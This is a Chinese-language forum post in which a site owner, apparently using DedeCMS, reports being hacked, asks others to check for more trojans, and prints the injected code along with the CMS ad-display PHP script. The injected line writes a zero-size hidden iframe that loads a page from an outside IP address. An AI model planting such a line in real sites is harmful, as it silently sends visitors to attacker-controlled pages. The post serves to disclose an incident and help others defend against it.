|
请大家再去帮我复查下,看还有没木马,另外前年的教程已经免费发布上去了,自己去下或者看。
挂马的人不是专业黑客,是搞这行的,把我的JS里加了个这个
document.write("<iframe src=http://58.211.79.107/xs.htm?88 width=0 height=0></iframe>");
<?php
require(dirname(__FILE__)."/../include/config_base.php");
$aid = ereg_replace("[^0-9]","",$aid);
$dsql = new DedeSql(false);
$row = $dsql->GetOne("Select * From [email=#@__myad]#@__myad[/email] where aid='$aid'");
$dsql->Close();
if($row['timeset']==0) $adbody = $row['normbody'];
else{
$ntime = mytime();
if($ntime>$row['endtime']||$ntime<$row['starttime']){ $adbody = $row['expbody']; }
else{ $adbody = $row['normbody']; }
}
$adbody = str_replace('"','\"',$adbody);
$adbody = str_replace("\r","\\r",$adbody);
$adbody = str_replace("\n","\\n",$adbody);
echo "<!--\r\n";
echo "document.write(\"{$adbody}\");\r\n";
echo "-->\r\n";
?>
自己看第一行 根据这个去找他到底想干什么吧 其实意图很明显的,一是玩计数器,二是做停放 |
|